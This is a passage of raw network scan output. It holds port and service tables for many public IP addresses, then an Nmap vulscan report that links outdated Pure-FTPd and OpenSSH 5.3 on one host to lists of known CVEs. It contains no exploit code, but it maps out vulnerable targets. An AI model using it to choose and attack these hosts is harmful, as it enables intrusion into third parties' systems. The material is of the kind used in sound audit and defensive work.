8069190.98.209.37 137 tcp netbios-ns filtered
8070190.98.209.37 137 udp netbios-ns unknown
8071190.98.209.37 138 tcp netbios-dgm filtered
8072190.98.209.37 138 udp netbios-dgm unknown
8073190.98.209.37 139 tcp netbios-ssn filtered
8074190.98.209.37 139 udp netbios-ssn unknown
8075190.98.209.37 161 tcp snmp filtered
8076190.98.209.37 161 udp snmp unknown
8077190.98.209.37 162 tcp snmptrap filtered
8078190.98.209.37 162 udp snmptrap unknown
8079190.98.209.37 389 tcp ldap filtered
8080190.98.209.37 389 udp ldap unknown
8081190.98.209.37 520 tcp efs filtered
8082190.98.209.37 520 udp route unknown
8083190.98.209.37 2049 tcp nfs filtered
8084190.98.209.37 2049 udp nfs unknown
8085190.153.209.187 53 tcp domain filtered
8086190.153.209.187 53 udp domain unknown
8087190.153.209.187 67 tcp dhcps filtered
8088190.153.209.187 67 udp dhcps unknown
8089190.153.209.187 68 tcp dhcpc filtered
8090190.153.209.187 68 udp dhcpc unknown
8091190.153.209.187 69 tcp tftp filtered
8092190.153.209.187 69 udp tftp unknown
8093190.153.209.187 88 tcp kerberos-sec filtered
8094190.153.209.187 88 udp kerberos-sec unknown
8095190.153.209.187 123 tcp ntp filtered
8096190.153.209.187 123 udp ntp unknown
8097190.153.209.187 137 tcp netbios-ns filtered
8098190.153.209.187 137 udp netbios-ns unknown
8099190.153.209.187 138 tcp netbios-dgm filtered
8100190.153.209.187 138 udp netbios-dgm unknown
8101190.153.209.187 139 tcp netbios-ssn filtered
8102190.153.209.187 139 udp netbios-ssn unknown
8103190.153.209.187 161 tcp snmp filtered
8104190.153.209.187 161 udp snmp unknown
8105190.153.209.187 162 tcp snmptrap filtered
8106190.153.209.187 162 udp snmptrap unknown
8107190.153.209.187 389 tcp ldap filtered
8108190.153.209.187 389 udp ldap unknown
8109190.153.209.187 520 tcp efs filtered
8110190.153.209.187 520 udp route unknown
8111190.153.209.187 2049 tcp nfs filtered
8112190.153.209.187 2049 udp nfs unknown
8113190.153.219.254 22 tcp ssh open SSH-2.0-OpenSSH_7.4
8114190.153.219.254 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8115190.153.219.254 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8116190.153.219.254 67 tcp dhcps filtered
8117190.153.219.254 67 udp dhcps unknown
8118190.153.219.254 68 tcp dhcpc filtered
8119190.153.219.254 68 udp dhcpc unknown
8120190.153.219.254 69 tcp tftp filtered
8121190.153.219.254 69 udp tftp unknown
8122190.153.219.254 88 tcp kerberos-sec filtered
8123190.153.219.254 88 udp kerberos-sec unknown
8124190.153.219.254 123 tcp ntp filtered
8125190.153.219.254 123 udp ntp unknown
8126190.153.219.254 137 tcp netbios-ns filtered
8127190.153.219.254 137 udp netbios-ns unknown
8128190.153.219.254 138 tcp netbios-dgm filtered
8129190.153.219.254 138 udp netbios-dgm unknown
8130190.153.219.254 139 tcp netbios-ssn filtered
8131190.153.219.254 139 udp netbios-ssn unknown
8132190.153.219.254 161 tcp snmp filtered
8133190.153.219.254 161 udp snmp unknown
8134190.153.219.254 162 tcp snmptrap filtered
8135190.153.219.254 162 udp snmptrap unknown
8136190.153.219.254 389 tcp ldap filtered
8137190.153.219.254 389 udp ldap unknown
8138190.153.219.254 520 tcp efs filtered
8139190.153.219.254 520 udp route unknown
8140190.153.219.254 2049 tcp nfs filtered
8141190.153.219.254 2049 udp nfs unknown
8142200.2.249.28 21 tcp ftp open vsftpd 3.0.2
8143200.2.249.28 53 udp domain unknown
8144200.2.249.28 67 udp dhcps unknown
8145200.2.249.28 68 udp dhcpc unknown
8146200.2.249.28 69 udp tftp unknown
8147200.2.249.28 80 tcp http open Oracle Application Server 10g httpd 10.1.3.5.0
8148200.2.249.28 88 udp kerberos-sec unknown
8149200.2.249.28 123 udp ntp unknown
8150200.2.249.28 137 udp netbios-ns unknown
8151200.2.249.28 138 udp netbios-dgm unknown
8152200.2.249.28 139 tcp netbios-ssn open Samba smbd 4.8.3 workgroup: SAMBA
8153200.2.249.28 139 udp netbios-ssn unknown
8154200.2.249.28 161 udp snmp unknown
8155200.2.249.28 162 udp snmptrap unknown
8156200.2.249.28 389 udp ldap unknown
8157200.2.249.28 445 tcp netbios-ssn open Samba smbd 4.8.3 workgroup: SAMBA
8158200.2.249.28 520 udp route unknown
8159200.2.249.28 2049 udp nfs unknown
8160200.29.0.33 53 tcp domain filtered
8161200.29.0.33 53 udp domain unknown
8162200.29.0.33 67 tcp dhcps filtered
8163200.29.0.33 67 udp dhcps unknown
8164200.29.0.33 68 tcp dhcpc filtered
8165200.29.0.33 68 udp dhcpc unknown
8166200.29.0.33 69 tcp tftp filtered
8167200.29.0.33 69 udp tftp unknown
8168200.29.0.33 88 tcp kerberos-sec filtered
8169200.29.0.33 88 udp kerberos-sec unknown
8170200.29.0.33 123 tcp ntp filtered
8171200.29.0.33 123 udp ntp unknown
8172200.29.0.33 137 tcp netbios-ns filtered
8173200.29.0.33 137 udp netbios-ns unknown
8174200.29.0.33 138 tcp netbios-dgm filtered
8175200.29.0.33 138 udp netbios-dgm unknown
8176200.29.0.33 139 tcp netbios-ssn filtered
8177200.29.0.33 139 udp netbios-ssn unknown
8178200.29.0.33 161 tcp snmp filtered
8179200.29.0.33 161 udp snmp unknown
8180200.29.0.33 162 tcp snmptrap filtered
8181200.29.0.33 162 udp snmptrap unknown
8182200.29.0.33 389 tcp ldap filtered
8183200.29.0.33 389 udp ldap unknown
8184200.29.0.33 520 tcp efs filtered
8185200.29.0.33 520 udp route unknown
8186200.29.0.33 2049 tcp nfs filtered
8187200.29.0.33 2049 udp nfs unknown
8188200.55.198.228 22 tcp ssh open SSH-2.0-OpenSSH_7.4p1 Debian-11.0nosystemd1
8189200.55.198.228 53 tcp domain open
8190200.55.198.228 53 udp domain open
8191200.55.198.228 67 tcp dhcps filtered
8192200.55.198.228 67 udp dhcps unknown
8193200.55.198.228 68 tcp dhcpc filtered
8194200.55.198.228 68 udp dhcpc unknown
8195200.55.198.228 69 tcp tftp filtered
8196200.55.198.228 69 udp tftp unknown
8197200.55.198.228 88 tcp kerberos-sec filtered
8198200.55.198.228 88 udp kerberos-sec unknown
8199200.55.198.228 123 tcp ntp filtered
8200200.55.198.228 123 udp ntp unknown
8201200.55.198.228 137 tcp netbios-ns filtered
8202200.55.198.228 137 udp netbios-ns unknown
8203200.55.198.228 138 tcp netbios-dgm filtered
8204200.55.198.228 138 udp netbios-dgm unknown
8205200.55.198.228 139 tcp netbios-ssn filtered
8206200.55.198.228 139 udp netbios-ssn unknown
8207200.55.198.228 161 tcp snmp filtered
8208200.55.198.228 161 udp snmp unknown
8209200.55.198.228 162 tcp snmptrap filtered
8210200.55.198.228 162 udp snmptrap unknown
8211200.55.198.228 389 tcp ldap filtered
8212200.55.198.228 389 udp ldap unknown
8213200.55.198.228 520 tcp efs filtered
8214200.55.198.228 520 udp route closed
8215200.55.198.228 2049 tcp nfs filtered
8216200.55.198.228 2049 udp nfs unknown
8217200.68.34.99 53 tcp domain filtered
8218200.68.34.99 53 udp domain unknown
8219200.68.34.99 67 tcp dhcps filtered
8220200.68.34.99 67 udp dhcps unknown
8221200.68.34.99 68 tcp dhcpc filtered
8222200.68.34.99 68 udp dhcpc unknown
8223200.68.34.99 69 tcp tftp filtered
8224200.68.34.99 69 udp tftp unknown
8225200.68.34.99 88 tcp kerberos-sec filtered
8226200.68.34.99 88 udp kerberos-sec unknown
8227200.68.34.99 123 tcp ntp filtered
8228200.68.34.99 123 udp ntp unknown
8229200.68.34.99 137 tcp netbios-ns filtered
8230200.68.34.99 137 udp netbios-ns unknown
8231200.68.34.99 138 tcp netbios-dgm filtered
8232200.68.34.99 138 udp netbios-dgm unknown
8233200.68.34.99 139 tcp netbios-ssn filtered
8234200.68.34.99 139 udp netbios-ssn unknown
8235200.68.34.99 161 tcp snmp filtered
8236200.68.34.99 161 udp snmp unknown
8237200.68.34.99 162 tcp snmptrap filtered
8238200.68.34.99 162 udp snmptrap unknown
8239200.68.34.99 389 tcp ldap filtered
8240200.68.34.99 389 udp ldap unknown
8241200.68.34.99 520 tcp efs filtered
8242200.68.34.99 520 udp route unknown
8243200.68.34.99 2049 tcp nfs filtered
8244200.68.34.99 2049 udp nfs unknown
8245200.73.54.34 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
8246200.73.54.34 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
8247200.73.54.34 67 tcp dhcps filtered
8248200.73.54.34 67 udp dhcps unknown
8249200.73.54.34 68 tcp dhcpc filtered
8250200.73.54.34 68 udp dhcpc unknown
8251200.73.54.34 69 tcp tftp filtered
8252200.73.54.34 69 udp tftp unknown
8253200.73.54.34 88 tcp kerberos-sec filtered
8254200.73.54.34 88 udp kerberos-sec unknown
8255200.73.54.34 123 tcp ntp filtered
8256200.73.54.34 123 udp ntp unknown
8257200.73.54.34 137 tcp netbios-ns filtered
8258200.73.54.34 137 udp netbios-ns unknown
8259200.73.54.34 138 tcp netbios-dgm filtered
8260200.73.54.34 138 udp netbios-dgm unknown
8261200.73.54.34 139 tcp netbios-ssn filtered
8262200.73.54.34 139 udp netbios-ssn unknown
8263200.73.54.34 161 tcp snmp filtered
8264200.73.54.34 161 udp snmp unknown
8265200.73.54.34 162 tcp snmptrap filtered
8266200.73.54.34 162 udp snmptrap unknown
8267200.73.54.34 389 tcp ldap filtered
8268200.73.54.34 389 udp ldap unknown
8269200.73.54.34 520 tcp efs filtered
8270200.73.54.34 520 udp route unknown
8271200.73.54.34 2049 tcp nfs filtered
8272200.73.54.34 2049 udp nfs unknown
8273204.93.193.141 21 tcp ftp open Your connection to this server has been blocked.\x0d\x0a\x0d\x0aYou are most likely being blocked due to use of incorrect user/pass combination. Please, check all of your computers/devices to make sure that they are using the correct login credentials, including your email clients. You may also get blocked due to too many POP3/IMAP logins in 1 minute interval, please adjust your email client settings.\x0d\x0a
8274204.93.193.141 53 tcp domain filtered
8275204.93.193.141 53 udp domain unknown
8276204.93.193.141 67 tcp dhcps filtered
8277204.93.193.141 67 udp dhcps unknown
8278204.93.193.141 68 tcp dhcpc filtered
8279204.93.193.141 68 udp dhcpc unknown
8280204.93.193.141 69 tcp tftp filtered
8281204.93.193.141 69 udp tftp unknown
8282204.93.193.141 88 tcp kerberos-sec filtered
8283204.93.193.141 88 udp kerberos-sec unknown
8284204.93.193.141 123 tcp ntp filtered
8285204.93.193.141 123 udp ntp unknown
8286204.93.193.141 137 tcp netbios-ns filtered
8287204.93.193.141 137 udp netbios-ns unknown
8288204.93.193.141 138 tcp netbios-dgm filtered
8289204.93.193.141 138 udp netbios-dgm unknown
8290204.93.193.141 139 tcp netbios-ssn filtered
8291204.93.193.141 139 udp netbios-ssn unknown
8292204.93.193.141 161 tcp snmp filtered
8293204.93.193.141 161 udp snmp unknown
8294204.93.193.141 162 tcp snmptrap filtered
8295204.93.193.141 162 udp snmptrap unknown
8296204.93.193.141 389 tcp ldap filtered
8297204.93.193.141 389 udp ldap unknown
8298204.93.193.141 520 tcp efs filtered
8299204.93.193.141 520 udp route unknown
8300204.93.193.141 2049 tcp nfs filtered
8301204.93.193.141 2049 udp nfs unknown
8302206.48.140.40 53 tcp domain filtered
8303206.48.140.40 53 udp domain unknown
8304206.48.140.40 67 tcp dhcps filtered
8305206.48.140.40 67 udp dhcps unknown
8306206.48.140.40 68 tcp dhcpc filtered
8307206.48.140.40 68 udp dhcpc unknown
8308206.48.140.40 69 tcp tftp filtered
8309206.48.140.40 69 udp tftp unknown
8310206.48.140.40 88 tcp kerberos-sec filtered
8311206.48.140.40 88 udp kerberos-sec unknown
8312206.48.140.40 123 tcp ntp filtered
8313206.48.140.40 123 udp ntp unknown
8314206.48.140.40 137 tcp netbios-ns filtered
8315206.48.140.40 137 udp netbios-ns unknown
8316206.48.140.40 138 tcp netbios-dgm filtered
8317206.48.140.40 138 udp netbios-dgm unknown
8318206.48.140.40 139 tcp netbios-ssn filtered
8319206.48.140.40 139 udp netbios-ssn unknown
8320206.48.140.40 161 tcp snmp filtered
8321206.48.140.40 161 udp snmp unknown
8322206.48.140.40 162 tcp snmptrap filtered
8323206.48.140.40 162 udp snmptrap unknown
8324206.48.140.40 389 tcp ldap filtered
8325206.48.140.40 389 udp ldap unknown
8326206.48.140.40 520 tcp efs filtered
8327206.48.140.40 520 udp route unknown
8328206.48.140.40 2049 tcp nfs filtered
8329206.48.140.40 2049 udp nfs unknown
8330207.246.147.189 53 tcp domain filtered
8331207.246.147.189 53 udp domain unknown
8332207.246.147.189 67 tcp dhcps filtered
8333207.246.147.189 67 udp dhcps unknown
8334207.246.147.189 68 tcp dhcpc filtered
8335207.246.147.189 68 udp dhcpc unknown
8336207.246.147.189 69 tcp tftp filtered
8337207.246.147.189 69 udp tftp unknown
8338207.246.147.189 80 tcp http open nginx
8339207.246.147.189 88 tcp kerberos-sec filtered
8340207.246.147.189 88 udp kerberos-sec unknown
8341207.246.147.189 123 tcp ntp filtered
8342207.246.147.189 123 udp ntp unknown
8343207.246.147.189 137 tcp netbios-ns filtered
8344207.246.147.189 137 udp netbios-ns unknown
8345207.246.147.189 138 tcp netbios-dgm filtered
8346207.246.147.189 138 udp netbios-dgm unknown
8347207.246.147.189 139 tcp netbios-ssn filtered
8348207.246.147.189 139 udp netbios-ssn unknown
8349207.246.147.189 161 tcp snmp filtered
8350207.246.147.189 161 udp snmp unknown
8351207.246.147.189 162 tcp snmptrap filtered
8352207.246.147.189 162 udp snmptrap unknown
8353207.246.147.189 389 tcp ldap filtered
8354207.246.147.189 389 udp ldap unknown
8355207.246.147.189 443 tcp ssl/http open nginx
8356207.246.147.189 520 tcp efs filtered
8357207.246.147.189 520 udp route unknown
8358207.246.147.189 2049 tcp nfs filtered
8359207.246.147.189 2049 udp nfs unknown
8360207.246.147.190 53 tcp domain filtered
8361207.246.147.190 53 udp domain unknown
8362207.246.147.190 67 tcp dhcps filtered
8363207.246.147.190 67 udp dhcps unknown
8364207.246.147.190 68 tcp dhcpc filtered
8365207.246.147.190 68 udp dhcpc unknown
8366207.246.147.190 69 tcp tftp filtered
8367207.246.147.190 69 udp tftp unknown
8368207.246.147.190 80 tcp http open nginx
8369207.246.147.190 88 tcp kerberos-sec filtered
8370207.246.147.190 88 udp kerberos-sec unknown
8371207.246.147.190 123 tcp ntp filtered
8372207.246.147.190 123 udp ntp unknown
8373207.246.147.190 137 tcp netbios-ns filtered
8374207.246.147.190 137 udp netbios-ns unknown
8375207.246.147.190 138 tcp netbios-dgm filtered
8376207.246.147.190 138 udp netbios-dgm filtered
8377207.246.147.190 139 tcp netbios-ssn filtered
8378207.246.147.190 139 udp netbios-ssn unknown
8379207.246.147.190 161 tcp snmp filtered
8380207.246.147.190 161 udp snmp unknown
8381207.246.147.190 162 tcp snmptrap filtered
8382207.246.147.190 162 udp snmptrap unknown
8383207.246.147.190 389 tcp ldap filtered
8384207.246.147.190 389 udp ldap unknown
8385207.246.147.190 443 tcp ssl/http open nginx
8386207.246.147.190 520 tcp efs filtered
8387207.246.147.190 520 udp route unknown
8388207.246.147.190 2049 tcp nfs filtered
8389207.246.147.190 2049 udp nfs unknown
8390207.246.147.247 53 tcp domain filtered
8391207.246.147.247 53 udp domain filtered
8392207.246.147.247 67 tcp dhcps filtered
8393207.246.147.247 67 udp dhcps unknown
8394207.246.147.247 68 tcp dhcpc filtered
8395207.246.147.247 68 udp dhcpc unknown
8396207.246.147.247 69 tcp tftp filtered
8397207.246.147.247 69 udp tftp unknown
8398207.246.147.247 80 tcp http open nginx
8399207.246.147.247 88 tcp kerberos-sec filtered
8400207.246.147.247 88 udp kerberos-sec unknown
8401207.246.147.247 123 tcp ntp filtered
8402207.246.147.247 123 udp ntp unknown
8403207.246.147.247 137 tcp netbios-ns filtered
8404207.246.147.247 137 udp netbios-ns filtered
8405207.246.147.247 138 tcp netbios-dgm filtered
8406207.246.147.247 138 udp netbios-dgm unknown
8407207.246.147.247 139 tcp netbios-ssn filtered
8408207.246.147.247 139 udp netbios-ssn unknown
8409207.246.147.247 161 tcp snmp filtered
8410207.246.147.247 161 udp snmp unknown
8411207.246.147.247 162 tcp snmptrap filtered
8412207.246.147.247 162 udp snmptrap unknown
8413207.246.147.247 389 tcp ldap filtered
8414207.246.147.247 389 udp ldap unknown
8415207.246.147.247 443 tcp ssl/http open nginx
8416207.246.147.247 520 tcp efs filtered
8417207.246.147.247 520 udp route unknown
8418207.246.147.247 2049 tcp nfs filtered
8419207.246.147.247 2049 udp nfs unknown
8420207.246.147.248 53 tcp domain filtered
8421207.246.147.248 53 udp domain unknown
8422207.246.147.248 67 tcp dhcps filtered
8423207.246.147.248 67 udp dhcps unknown
8424207.246.147.248 68 tcp dhcpc filtered
8425207.246.147.248 68 udp dhcpc unknown
8426207.246.147.248 69 tcp tftp filtered
8427207.246.147.248 69 udp tftp unknown
8428207.246.147.248 80 tcp http open nginx
8429207.246.147.248 88 tcp kerberos-sec filtered
8430207.246.147.248 88 udp kerberos-sec unknown
8431207.246.147.248 123 tcp ntp filtered
8432207.246.147.248 123 udp ntp unknown
8433207.246.147.248 137 tcp netbios-ns filtered
8434207.246.147.248 137 udp netbios-ns unknown
8435207.246.147.248 138 tcp netbios-dgm filtered
8436207.246.147.248 138 udp netbios-dgm unknown
8437207.246.147.248 139 tcp netbios-ssn filtered
8438207.246.147.248 139 udp netbios-ssn unknown
8439207.246.147.248 161 tcp snmp filtered
8440207.246.147.248 161 udp snmp unknown
8441207.246.147.248 162 tcp snmptrap filtered
8442207.246.147.248 162 udp snmptrap unknown
8443207.246.147.248 389 tcp ldap filtered
8444207.246.147.248 389 udp ldap unknown
8445207.246.147.248 443 tcp ssl/http open nginx
8446207.246.147.248 520 tcp efs filtered
8447207.246.147.248 520 udp route unknown
8448207.246.147.248 2049 tcp nfs filtered
8449207.246.147.248 2049 udp nfs unknown
8450211.13.196.135 25 tcp smtp closed
8451211.13.196.135 53 tcp domain filtered
8452211.13.196.135 53 udp domain unknown
8453211.13.196.135 67 tcp dhcps filtered
8454211.13.196.135 67 udp dhcps unknown
8455211.13.196.135 68 tcp dhcpc filtered
8456211.13.196.135 68 udp dhcpc unknown
8457211.13.196.135 69 tcp tftp filtered
8458211.13.196.135 69 udp tftp unknown
8459211.13.196.135 80 tcp http open Apache httpd
8460211.13.196.135 88 tcp kerberos-sec filtered
8461211.13.196.135 88 udp kerberos-sec unknown
8462211.13.196.135 113 tcp ident closed
8463211.13.196.135 123 tcp ntp filtered
8464211.13.196.135 123 udp ntp unknown
8465211.13.196.135 137 tcp netbios-ns filtered
8466211.13.196.135 137 udp netbios-ns filtered
8467211.13.196.135 138 tcp netbios-dgm filtered
8468211.13.196.135 138 udp netbios-dgm filtered
8469211.13.196.135 139 tcp netbios-ssn closed
8470211.13.196.135 139 udp netbios-ssn unknown
8471211.13.196.135 161 tcp snmp filtered
8472211.13.196.135 161 udp snmp unknown
8473211.13.196.135 162 tcp snmptrap filtered
8474211.13.196.135 162 udp snmptrap unknown
8475211.13.196.135 389 tcp ldap filtered
8476211.13.196.135 389 udp ldap unknown
8477211.13.196.135 443 tcp ssl/http open Apache httpd
8478211.13.196.135 445 tcp microsoft-ds closed
8479211.13.196.135 520 tcp efs filtered
8480211.13.196.135 520 udp route unknown
8481211.13.196.135 2049 tcp nfs filtered
8482211.13.196.135 2049 udp nfs unknown
8483218.45.5.97 25 tcp smtp closed
8484218.45.5.97 53 tcp domain filtered
8485218.45.5.97 53 udp domain unknown
8486218.45.5.97 67 tcp dhcps filtered
8487218.45.5.97 67 udp dhcps unknown
8488218.45.5.97 68 tcp dhcpc filtered
8489218.45.5.97 68 udp dhcpc unknown
8490218.45.5.97 69 tcp tftp filtered
8491218.45.5.97 69 udp tftp unknown
8492218.45.5.97 80 tcp http open Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.15
8493218.45.5.97 88 tcp kerberos-sec filtered
8494218.45.5.97 88 udp kerberos-sec unknown
8495218.45.5.97 113 tcp ident closed
8496218.45.5.97 123 tcp ntp filtered
8497218.45.5.97 123 udp ntp unknown
8498218.45.5.97 137 tcp netbios-ns filtered
8499218.45.5.97 137 udp netbios-ns filtered
8500218.45.5.97 138 tcp netbios-dgm filtered
8501218.45.5.97 138 udp netbios-dgm filtered
8502218.45.5.97 139 tcp netbios-ssn closed
8503218.45.5.97 139 udp netbios-ssn unknown
8504218.45.5.97 161 tcp snmp filtered
8505218.45.5.97 161 udp snmp unknown
8506218.45.5.97 162 tcp snmptrap filtered
8507218.45.5.97 162 udp snmptrap unknown
8508218.45.5.97 389 tcp ldap filtered
8509218.45.5.97 389 udp ldap unknown
8510218.45.5.97 443 tcp ssl/http open Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.15
8511218.45.5.97 445 tcp microsoft-ds closed
8512218.45.5.97 520 tcp efs filtered
8513218.45.5.97 520 udp route unknown
8514218.45.5.97 2049 tcp nfs filtered
8515218.45.5.97 2049 udp nfs unknown
8516######################################################################################################################################
8517Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 06:42 EST
8518Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
8519Host is up (0.48s latency).
8520Not shown: 981 closed ports
8521PORT STATE SERVICE VERSION
852221/tcp open ftp Pure-FTPd
8523| vulscan: VulDB - https://vuldb.com:
8524| [102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd HTTP Request privilege escalation
8525| [57510] Pureftpd Pure-FTPd up to 0.x Memory Consumption denial of service
8526| [57504] Pureftpd Pure-FTPd up to 0.x ftp_parser.c Cleartext unknown vulnerability
8527|
8528| MITRE CVE - https://cve.mitre.org:
8529| [CVE-2004-0656] The accept_client function in PureFTPd 1.0.18 and earlier allows remote attackers to cause a denial of service by exceeding the maximum number of connections.
8530|
8531| SecurityFocus - https://www.securityfocus.com/bid/:
8532| [10664] PureFTPd Accept_Client Remote Denial of Service Vulnerability
8533|
8534| IBM X-Force - https://exchange.xforce.ibmcloud.com:
8535| No findings
8536|
8537| Exploit-DB - https://www.exploit-db.com:
8538| No findings
8539|
8540| OpenVAS (Nessus) - http://www.openvas.org:
8541| No findings
8542|
8543| SecurityTracker - https://www.securitytracker.com:
8544| [1010701] PureFTPd Logic Bug in accept_client() Lets Remote Users Crash the FTP Daemon
8545| [1008135] (Claim is Retracted) PureFTPd Buffer Overflow in displayrate() Lets Remote Users Crash the Service
8546| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
8547| [1001126] PureFTPd May Allow Remote Users to Deny Service on the Server
8548|
8549| OSVDB - http://www.osvdb.org:
8550| No findings
8551|_
855222/tcp open ssh OpenSSH 5.3 (protocol 2.0)
8553| vulscan: VulDB - https://vuldb.com:
8554| [80267] OpenSSH up to 5.x/6.x/7.1p1 Forward Option roaming_common.c roaming_read/roaming_write memory corruption
8555| [80266] OpenSSH up to 5.x/6.x/7.1p1 roaming_common.c resend_bytes information disclosure
8556| [4584] OpenSSH up to 5.7 auth-options.c information disclosure
8557| [4282] OpenSSH 5.6/5.7 Legacy Certificate memory corruption
8558|
8559| MITRE CVE - https://cve.mitre.org:
8560| [CVE-2006-0883] OpenSSH on FreeBSD 5.3 and 5.4, when used with OpenPAM, does not properly handle when a forked child process terminates during PAM authentication, which allows remote attackers to cause a denial of service (client connection refusal) by connecting multiple times to the SSH server, waiting for the password prompt, then disconnecting.
8561| [CVE-2012-0814] The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite. NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory.
8562| [CVE-2011-5000] The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
8563| [CVE-2011-0539] The key_certify function in usr.bin/ssh/key.c in OpenSSH 5.6 and 5.7, when generating legacy certificates using the -t command-line option in ssh-keygen, does not initialize the nonce field, which might allow remote attackers to obtain sensitive stack memory contents or make it easier to conduct hash collision attacks.
8564| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
8565| [CVE-2010-4478] OpenSSH 5.6 and earlier, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol, a related issue to CVE-2010-4252.
8566| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
8567| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
8568| [CVE-2008-3259] OpenSSH before 5.1 sets the SO_REUSEADDR socket option when the X11UseLocalhost configuration setting is disabled, which allows local users on some platforms to hijack the X11 forwarding port via a bind to a single IP address, as demonstrated on the HP-UX platform.
8569|
8570| SecurityFocus - https://www.securityfocus.com/bid/:
8571| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
8572| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
8573| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
8574| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
8575| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
8576| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
8577| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
8578| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
8579| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
8580| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
8581| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
8582| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
8583| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
8584| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
8585| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
8586| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
8587| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
8588| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
8589| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
8590| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
8591| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
8592| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
8593| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
8594| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
8595| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
8596| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
8597| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
8598| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
8599| [75990] OpenSSH Login Handling Security Bypass Weakness
8600| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
8601| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
8602| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
8603| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
8604| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
8605| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
8606| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
8607| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
8608| [61286] OpenSSH Remote Denial of Service Vulnerability
8609| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
8610| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
8611| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
8612| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
8613| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
8614| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
8615| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
8616| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
8617| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
8618| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
